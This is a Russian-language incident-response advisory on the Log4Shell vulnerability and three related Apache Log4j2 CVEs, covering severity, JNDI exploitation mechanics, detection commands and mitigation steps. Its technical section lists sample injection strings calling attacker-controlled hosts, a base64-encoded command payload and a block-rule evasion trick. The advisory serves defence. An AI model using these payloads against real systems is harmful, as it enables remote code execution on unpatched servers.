Обновлено от 28.12.2021

1. Описание зафиксированной угрозы

Первая уязвимость

[Название угрозы]: RCE-уязвимость в библиотеке журналирования приложений Apache Log4j (aka Log4Shell, Log4Jam)

[Тип угрозы]: уязвимость удаленного исполнения кода (RCE)

[CVE]: CVE-2021-44228

[CVSS vector]: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

[Platform]: Cross-platform

[Product]: Apache Log4j2

[Version]: все версии от 2.0-beta9 до 2.14.1

[Severity]: 10/10

[Дата обнаружения]: 24.11.2021

Вторая уязвимость

[Название угрозы]: RCE-уязвимость в Apache Log4j2 Thread Context Lookup Pattern при нестандартных конфигурациях

[Тип угрозы]: уязвимость удаленного исполнения кода (RCE)

[CVE]: CVE-2021-45046

[CVSS vector]: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

[Platform]: Cross-platform

[Product]: Apache Log4j2

[Version]: все версии от 2.0-beta9 до 2.15.0, кроме 2.12.2

[Severity]: 9/10

[Дата обнаружения]: 14.12.2021

Третья уязвимость

[Название угрозы]: Отсутствие защиты от неконтролируемой рекурсии при поиске

[Тип угрозы]: Отказ в обслуживание (DoS)

[CVE]: CVE-2021-45105

[CVSS vector]: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

[Platform]: Cross-platform

[Product]: Apache Log4j2

[Version]: все версии от 2.0-beta9 до 2.16.0

[Severity]: 7.5/10

[Дата обнаружения]: 16.12.2021

Четвертая уязвимость

[Название угрозы]: RCE-уязвимость в библиотеке при нестандартных(вредоносных) конфигурациях

[Тип угрозы]: уязвимость удаленного исполнения кода (RCE)

[CVE]: CVE-2021-44832

[CVSS vector]: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H

[Platform]: Cross-platform

[Product]: Apache Log4j2

[Version]: все версии от 2.0-alpha7 до 2.17.0, за исключением 2.3.2 и 2.12.4

[Severity]: 6.6/10

[Дата обнаружения]: 11.12.2021

24 ноября 2021 года группа исследователей кибербезопасности из Alibaba Cloud официально уведомила Apache об обнаружении опасной уязвимости удаленного выполнения кода в библиотеке журналирования Apache Log4j 2.

Log4j 2 – это широко распространённая сторонняя библиотека журналов с открытым исходным кодом, используемая в программных приложениях и службах. Log4j 2 применяется в первую очередь в приложениях, написанных на языке программирования Java, однако также часто встречается в приложениях, которые используют другие языки, такие как Scala, Groovy или Clojure. Поскольку данные языки программирования используются множеством приложений как для OS Windows, так и Linux, то уязвимость имеет кроссплатформенный характер.

Уязвимость Log4Shell (CVE-2021-44228) является крайне опасной по трем причинам:

1)   Во-первых, злоумышленники могут легко ее эксплуатировать. Передать уязвимому компоненту эксплойт можно множеством способов, например, указав в поле логина или одном из полей HTTP заголовка простую текстовую команду. Особые навыки для этого не нужны.

2)   Во-вторых, библиотека, в которой нашли Log4Shell, чрезвычайно широко используется в системах и продуктах различных производителей. В числе пострадавших компании Apple, Amazon, CloudFlare, Google, LinkedIn, уязвимы решения от Cisco, Oracle, RedHat и др. Наиболее актуальный список подверженных уязвимости продуктов можно найти здесь.

3)   В-третьих, уязвимые продукты и решения, как правило, доступны в интернете, т.е. злоумышленнику не нужно каким-либо образом проникать в инфраструктуру компании-жертвы, достаточно всего лишь обратиться к веб-сайту или опубликованному решению, использующим уязвимый компонент.

В настоящее время Jet CSIRT фиксирует факты того, что уязвимость Log4Shell уже активно применяется в реальных атаках на организации, в том числе операторами шифровальщиков.

2. Технические детали угрозы

CVE-2021-44228

Библиотека Log4j 2 содержит класс JndiLookup (org.apache.logging.log4j.core.lookup), который позволяет получать переменные через механизм JNDI (Java Naming and Directory Interface).
JNDI – это служба каталогов, благодаря которой Java-клиенты могут находить данные (в форме объекта Java) в каталоге. JNDI имеет ряд интерфейсов поставщиков услуг (SPI), которые позволяют использовать различные службы каталогов, среди них – CORBA COS (Common Object Service), RMI (Remote Method Interface), DNS (Domain Name System), LDAP (Lightweight Directory Access Protocol), HTTP (Hyper-Text Transfer Protocol) и другие.

По умолчанию ключ для класса JndiLookup будет иметь префикс java:comp/env/, однако, если ключ содержит ":" (двоеточие), то префикс не будет добавлен. Таким образом, если передать серверу строку вида: ${jndi:dns://attacker.com/payload}, то сервер выполнит запрос к ресурсу attacker.com.
Эксплуатация уязвимости Log4Shell происходит в несколько этапов:

1) Злоумышленник каким-либо образом отправляет на атакуемый сервер данные, которые записываются в журнал посредством уязвимого компонента Log4j.
Это может быть HTTP-запрос, заполнение какой-либо веб-формы или поля для ввода данных на сайте, отправка сообщения в чат приложения и другое. Самое главное – чтобы эти данные записались в журнал атакуемого приложения.
Данные обычно содержат вредоносную нагрузку вида:
${jndi:dns://attacker.com/payload}
Где attacker.com – сервер, контролируемый злоумышленником;
payload – вредоносная нагрузка, которую злоумышленник хочет исполнить;

2) Уязвимый компонент Log4j через класс JndiLookup обратится к серверу злоумышленника посредством JNDI.

3) Контролируемый злоумышленником сервер возвращает в качестве ответа вредоносную нагрузку, которая исполняется на атакуемом хосте.

Пример вредоносных сущностей:

Пример внедрения вредоносной нагрузки в User-Agent:
Mozilla/5.0 ${jndi:ldap://x.x.x.x:5555/ExploitD}/ua

Пример использования HTTP в качестве SPI:
${jndi:hxxp://x.x.x.x/callback/https-port-443-and-http-callback-scheme}

Пример использования LDAP в качестве SPI:
${jndi:ldap://enq0u7nftpr.m.example.com:80/cf-198-41-223-33.cloudflare.com.gu}

Пример использования LDAP в качестве SPI и вредоносной нагрузки, закодированной base64:
${jndi:ldap://x.x.x.x:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wZW50ZXN0Y2hlY2s=}

Пример кодирования конструкции ${jndi в base64:
${base64:JHtqbmRp

Пример обхода блокировок типовых строк, таких как jndi:ldap:
${jndi:${lower:l}${lower:d}a${lower:p}://example.com/x

CVE-2021-45046

Данная уязвимость связана с недостаточным решением проблемы в рамках устранения уязвимости CVE-2021-44228.
В случае если в конфигурации используется нестандартный шаблон (пример: {$$(ctx:loginid} ) атакущий может сгенерировать вредоносный запрос с использованием JNDI и тем самым выполнить произвольный код в системе.

CVE-2021-45105

Уязвимость связана с отсутствием защиты от неконтролируемой рекурсии.
В случае если в конфигурации используется нестандартный шаблон (пример: {$$(ctx:loginid} ) злоумышленник может создать вредоносный запрос, содержащий рекурсивный поиск, что приведет к ошибке StackOverflowError и как следствие завершит процесс в системе.

CVE-2021-44832

При наличии разрешений на изменение файлов конфигурации злоумышленник может создать вредоносную конфигурацию с использованием JDBC Appender, где источник может ссылаться на JDNI URI, позволяющий выполнить произвольный код в системе.

3. Рекомендации по обнаружению уязвимых компонентов

Для обнаружения уязвимых компонентов в своей инфраструктуре рекомендуется выполнить следующие действия:

• Определить список потенциально уязвимых решений, используемых в инфраструктуре, и ознакомиться с бюллетенем безопасности о Log4j 2 от производителя с помощью следующих ресурсов:
• https://github.com/NCSC-NL/log4shell/tree/main/software
• https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592
• https://github.com/YfryTchsGD/Log4jAttackSurface

Важно! В первую очередь рекомендуется сфокусироваться на системах, которые должны быть доступны из Интернета или находящихся в DMZ-зонах, а затем на внутренних системах, к которым нет доступа извне.

Поиск уязвимых библиотек можно выполнить одним из следующих способов:
Выполнить поиск библиотек, содержащих JndiLookup.class:
В переменной %путь% необходимо указывать целевой каталог проверки или диск(Пример: "C:\" для Windows или "/" для Unix)

Для Unix-систем:

• find %путь% -name "*.jar" -exec sh -c 'unzip -l "{}" | grep -i --color=always JndiLookup.class' \; -print
• Для Windows-систем:

Powershell 3.0 и выше:

Get-ChildItem -Path "%путь%" -File "*.jar" -rec -ea 0 | foreach {select-string "JndiLookup.class" $_} | select -exp Path

Powershell 2.0:

Get-ChildItem -Path "%путь%" -rec -force  -include *.jar -ea 0 | foreach {select-string "JndiLookup.class" $_} | select -exp Pat

• Выполнить поиск уязвимых библиотек по хэш-суммам с помощью утилиты командной строки, разработанной компанией Lunasec:
• https://github.com/lunasec-io/lunasec/releases

Пример команды на Linux и OSX:

log4shell scan your-project-dir/

Пример команды на Windows:

log4shell.exe scan your-project-dir/

Пример вывода работы инструмента:

8:08AM INF identified vulnerable path fileName=org/apache/logging/log4j/core/net/JndiManager$1.class path=test/struts-2.5.28-all/struts-2.5.28/apps/struts2-rest-showcase.war::WEB-INF/lib/log4j-core-2.12.1.jar versionInfo="log4j 2.8.2-2.12.0" Выполнить сканирование файловой системы на предмет наличия уязвимого файла log4j.jar.

Установить инструмент: git clone https://github.com/lunasec-io/lunasec.git cd lunasec/tools/log4shell-scripts./setup.sh

Запустить сканирование:./find-bad-deps.sh /path/to/folder/to/scan

Это менее точный метод обнаружения, поскольку он требует присутствия файла log4j.jar внутри файловой системы для проверки.

• Выполнить ручную проверку журналов на предмет попыток эксплуатации уязвимости.
• Для Unix-систем: sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+|\$\{base64:JHtqbmRp' /var/log//

4. Рекомендации по устранению уязвимости Log4Shell

Важно! В случае использования вендорского решения рекомендуется ознакомиться с официальным бюллетенем безопасности о Log4j от производителя. Наиболее актуальный список уязвимых решений по производителям приведен здесь.

•   После определения списка уязвимых систем как можно скорее выполнить установку официального обновления безопасности от Apache Log4j  версии 2.17.1 для Java 8, 2.12.4 для Java 7 и 2.3.2 для Java 6: https://logging.apache.org/log4j/2.x/download.html

Важно! В первую очередь рекомендуется выполнять обновления на системах, которые должны быть доступны из Интернета или находящихся в DMZ-зонах, а затем на внутренних системах, к которым нет доступа извне.

• Если по каким-либо причинам оперативное обновление системы, доступной извне, невозможно, то рекомендуется изолировать систему от Интернета и выполнить следующее действие (также применимо ко внутренним системам в качестве временного решения): 

• Удалить класс JndiLookup с помощью команды:zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

ВНИМАНИЕ! Временные решения не гарантируют полного устранения проблем, для полноценного закрытия уязвимости необходимо выполнить обновление до версии 2.17.1 для Java 8, 2.12.4 для Java 7 и 2.3.2 для Java 6.Предыдущие меры по снижению риска, связанные с конфигурацией флага log4j2.noFormatMsgLookup в значение true, НЕ уменьшают опасность уязвимости. В результате применения данного метода, была обнаружена новая уязвимость CVE-2021-45046. В связи с чем, в качестве временного решения работает только удаление класса JndiLookup.

5. Основные индикаторы компрометации

6. Ссылки

https://www.cyberkendra.com/2021/12/apache-log4j-vulnerability-details-and.html
https://www.cyberkendra.com/2021/12/log4shell-advisory-resource-cheat-sheet.html
https://logging.apache.org/log4j/2.x/security.html
https://www.lunasec.io/docs/blog/log4j-zero-day/
https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/
https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/
https://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide/
https://github.com/lunasec-io/lunasec/releases
https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592
https://github.com/YfryTchsGD/Log4jAttackSurface
https://github.com/NCSC-NL/log4shell/tree/main/software